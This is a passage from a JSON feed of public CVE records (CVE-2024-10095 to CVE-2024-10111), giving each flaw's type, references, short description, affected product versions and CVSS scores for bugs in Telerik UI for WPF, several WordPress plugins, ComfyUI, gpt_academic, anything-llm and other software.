"ID" : "CVE-2024-10095", "ASSIGNER" : "security@progress.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-502" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://docs.telerik.com/devtools/wpf/knowledge-base/kb-security-unsafe-deserialization-vulnerability-cve-2024-10095", "name" : "https://docs.telerik.com/devtools/wpf/knowledge-base/kb-security-unsafe-deserialization-vulnerability-cve-2024-10095", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In Progress Telerik UI for WPF versions prior to 2024 Q4 (2024.4.1213), a code execution attack is possible through an insecure deserialization vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:telerik:ui_for_wpf:*:*:*:*:*:*:*:*", "versionEndExcluding" : "24.4.1213", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-12-16T17:15Z", "lastModifiedDate" : "2024-12-18T12:59Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10096", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-03-26T17:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10097", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://loginizer.com/", "name" : "https://loginizer.com/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/loginizer/trunk/main/social-login.php?rev=3108779#L127", "name" : "https://plugins.trac.wordpress.org/browser/loginizer/trunk/main/social-login.php?rev=3108779#L127", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3173657/", "name" : "https://plugins.trac.wordpress.org/changeset/3173657/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5db00b22-d766-4fde-86fe-98d90936028c?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5db00b22-d766-4fde-86fe-98d90936028c?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Loginizer Security and Loginizer plugins for WordPress are vulnerable to authentication bypass in all versions up to, and including, 1.9.2. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:loginizer:loginizer:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.9.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.1, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-11-05T07:15Z", "lastModifiedDate" : "2024-11-06T19:14Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10098", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/242dac1f-9a1f-4fde-b8c7-374bd451071d/", "name" : "https://wpscan.com/vulnerability/242dac1f-9a1f-4fde-b8c7-374bd451071d/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/242dac1f-9a1f-4fde-b8c7-374bd451071d/", "name" : "https://wpscan.com/vulnerability/242dac1f-9a1f-4fde-b8c7-374bd451071d/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The ApplyOnline WordPress plugin before 2.6.3 does not protect uploaded files during the application process, allowing unauthenticated users to access them and any private information they contain" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:spiderteams:applyonline_-_application_form_builder_and_manager:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.6.3", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-05-15T20:15Z", "lastModifiedDate" : "2025-06-09T18:23Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10099", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://huntr.com/bounties/14fb8c9a-692a-4d8c-b4b2-24c6f91a383c", "name" : "https://huntr.com/bounties/14fb8c9a-692a-4d8c-b4b2-24c6f91a383c", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A stored cross-site scripting (XSS) vulnerability exists in comfyanonymous/comfyui version 0.2.2 and possibly earlier. The vulnerability occurs when an attacker uploads an HTML file containing a malicious XSS payload via the `/api/upload/image` endpoint. The payload is executed when the file is viewed through the `/view` API endpoint, leading to potential execution of arbitrary JavaScript code." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:comfy:comfyui:0.2.2:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-17T19:15Z", "lastModifiedDate" : "2024-10-21T21:03Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1010", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jomskiller/Employee-Management-System---Stored-XSS", "name" : "https://github.com/jomskiller/Employee-Management-System---Stored-XSS", "refsource" : "", "tags" : [ "Exploit", "Mitigation", "Third Party Advisory" ] }, { "url" : "https://github.com/jomskiller/Employee-Management-System---Stored-XSS/", "name" : "https://github.com/jomskiller/Employee-Management-System---Stored-XSS/", "refsource" : "", "tags" : [ "Exploit", "Mitigation", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252279", "name" : "https://vuldb.com/?ctiid.252279", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.252279", "name" : "https://vuldb.com/?id.252279", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/jomskiller/Employee-Management-System---Stored-XSS", "name" : "https://github.com/jomskiller/Employee-Management-System---Stored-XSS", "refsource" : "", "tags" : [ "Exploit", "Mitigation", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252279", "name" : "https://vuldb.com/?id.252279", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252279", "name" : "https://vuldb.com/?ctiid.252279", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://github.com/jomskiller/Employee-Management-System---Stored-XSS/", "name" : "https://github.com/jomskiller/Employee-Management-System---Stored-XSS/", "refsource" : "", "tags" : [ "Exploit", "Mitigation", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic has been found in SourceCodester Employee Management System 1.0. This affects an unknown part of the file edit-profile.php. The manipulation of the argument fullname/phone/date of birth/address/date of appointment leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-252279." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:employee_management_system_project:employee_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-29T17:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10100", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://huntr.com/bounties/e58a0fb4-2b1d-49ef-b32e-bb62659a6f99", "name" : "https://huntr.com/bounties/e58a0fb4-2b1d-49ef-b32e-bb62659a6f99", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A path traversal vulnerability exists in binary-husky/gpt_academic version 3.83. The vulnerability is due to improper handling of the file parameter, which is open to path traversal through URL encoding. This allows attackers to view any file on the host system, including sensitive files such as critical application files, SSH keys, API keys, and configuration values." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:binary-husky:gpt_academic:3.83:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-10-17T19:15Z", "lastModifiedDate" : "2025-07-11T20:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10101", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://huntr.com/bounties/0436d96a-a2c4-4ca5-9f3c-fd68eb74d2cb", "name" : "https://huntr.com/bounties/0436d96a-a2c4-4ca5-9f3c-fd68eb74d2cb", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A stored cross-site scripting (XSS) vulnerability exists in binary-husky/gpt_academic version 3.83. The vulnerability occurs at the /file endpoint, which renders HTML files. Malicious HTML files containing XSS payloads can be uploaded and stored in the backend, leading to the execution of the payload in the victim's browser when the file is accessed. This can result in the theft of session cookies or other sensitive information." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:binary-husky:gpt_academic:3.83:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-10-17T19:15Z", "lastModifiedDate" : "2025-07-11T20:44Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10102", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/3b34d1ec-5370-40a8-964e-663f4f9f42f8/", "name" : "https://wpscan.com/vulnerability/3b34d1ec-5370-40a8-964e-663f4f9f42f8/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/3b34d1ec-5370-40a8-964e-663f4f9f42f8/", "name" : "https://wpscan.com/vulnerability/3b34d1ec-5370-40a8-964e-663f4f9f42f8/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Photo Gallery, Images, Slider in Rbs Image Gallery WordPress plugin before 3.2.22 does not sanitise and escape some of its Gallery settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:robosoft:robo_gallery:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.2.22", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-01-07T06:15Z", "lastModifiedDate" : "2025-05-14T13:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10103", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/89660883-5f34-426a-ad06-741c0c213ecc/", "name" : "https://wpscan.com/vulnerability/89660883-5f34-426a-ad06-741c0c213ecc/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In the process of testing the MailPoet WordPress plugin before 5.3.2, a vulnerability was found that allows you to implement Stored XSS on behalf of the editor by embedding malicious script, which entails account takeover backdoor" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:automattic:mailpoet:*:*:*:*:free:wordpress:*:*", "versionEndExcluding" : "5.3.2", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-11-19T06:15Z", "lastModifiedDate" : "2025-06-12T17:01Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10104", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/f0a9c8ae-f2cf-4322-8216-4778b0e37a48/", "name" : "https://wpscan.com/vulnerability/f0a9c8ae-f2cf-4322-8216-4778b0e37a48/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Jobs for WordPress plugin before 2.7.8 does not sanitise and escape some of its Job settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:blueglass:jobs_for_wordpress:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.7.8", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-11-15T07:15Z", "lastModifiedDate" : "2025-04-11T15:04Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10105", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/4477db12-26e9-4c6d-8b71-f3f6a0d19813/", "name" : "https://wpscan.com/vulnerability/4477db12-26e9-4c6d-8b71-f3f6a0d19813/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Job Postings WordPress plugin before 2.7.11 does not sanitise and escape some of its settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:blueglass:jobs_for_wordpress:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.7.11", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-03-25T06:15Z", "lastModifiedDate" : "2025-04-02T17:33Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10106", "ASSIGNER" : "product-security@silabs.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://community.silabs.com/069Vm00000I1JawIAF", "name" : "https://community.silabs.com/069Vm00000I1JawIAF", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/SiliconLabs/simplicity_sdk/releases", "name" : "https://github.com/SiliconLabs/simplicity_sdk/releases", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A buffer overflow vulnerability in the packet handoff plugin allows an attacker to overwrite memory outside the plugin's buffer." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-01-09T15:15Z", "lastModifiedDate" : "2025-01-09T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10107", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/83590cad-6bfb-4dc7-b8fd-aecbc66f3c33/", "name" : "https://wpscan.com/vulnerability/83590cad-6bfb-4dc7-b8fd-aecbc66f3c33/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/83590cad-6bfb-4dc7-b8fd-aecbc66f3c33/", "name" : "https://wpscan.com/vulnerability/83590cad-6bfb-4dc7-b8fd-aecbc66f3c33/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Giveaways and Contests by RafflePress WordPress plugin before 1.12.17 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:seedprod:rafflepress:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.12.17", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-05-15T20:15Z", "lastModifiedDate" : "2025-06-04T20:38Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10108", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8b213c3b-3907-47d9-9826-379936f15078?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8b213c3b-3907-47d9-9826-379936f15078?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/wpadverts/#developers", "name" : "https://wordpress.org/plugins/wpadverts/#developers", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3178088/", "name" : "https://plugins.trac.wordpress.org/changeset/3178088/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WPAdverts – Classifieds Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's adverts_add shortcode in all versions up to, and including, 2.1.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-30T07:15Z", "lastModifiedDate" : "2024-11-01T12:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10109", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-863" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/mintplex-labs/anything-llm/commit/8d302c3f670c582b09d47e96132c248101447a11", "name" : "https://github.com/mintplex-labs/anything-llm/commit/8d302c3f670c582b09d47e96132c248101447a11", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/ad3c9e76-679d-4775-b203-96947ff73551", "name" : "https://huntr.com/bounties/ad3c9e76-679d-4775-b203-96947ff73551", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability in the mintplex-labs/anything-llm repository, as of commit 5c40419, allows low privilege users to access the sensitive API endpoint \"/api/system/custom-models\". This access enables them to modify the model's API key and base path, leading to potential API key leakage and denial of service on chats." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.3.1", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-07-11T20:43Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1011", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jomskiller/Employee-Managemet-System---Broken-Access-Control", "name" : "https://github.com/jomskiller/Employee-Managemet-System---Broken-Access-Control", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252280", "name" : "https://vuldb.com/?ctiid.252280", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.252280", "name" : "https://vuldb.com/?id.252280", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/jomskiller/Employee-Managemet-System---Broken-Access-Control", "name" : "https://github.com/jomskiller/Employee-Managemet-System---Broken-Access-Control", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252280", "name" : "https://vuldb.com/?id.252280", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252280", "name" : "https://vuldb.com/?ctiid.252280", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic was found in SourceCodester Employee Management System 1.0. This vulnerability affects unknown code of the file delete-leave.php of the component Leave Handler. The manipulation of the argument id leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252280." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:employee_management_system_project:employee_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T17:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10110", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-400" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://huntr.com/bounties/5ea6cf56-7b4c-4dce-9b6c-3e910fbb1ae4", "name" : "https://huntr.com/bounties/5ea6cf56-7b4c-4dce-9b6c-3e910fbb1ae4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In version 3.23.0 of aimhubio/aim, the ScheduledStatusReporter object can be instantiated to run on the main thread of the tracking server, leading to the main thread being blocked indefinitely. This results in a denial of service as the tracking server becomes unable to respond to other requests." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:aimstack:aim:3.23.0:*:*:*:*:python:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-07-23T20:56Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10111", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-287" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wordpress.org/plugins/miniorange-login-with-eve-online-google-facebook/", "name" : "https://wordpress.org/plugins/miniorange-login-with-eve-online-google-facebook/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ddd83877-739f-4c21-8179-20de8bbc4936?source=cve", "name" : 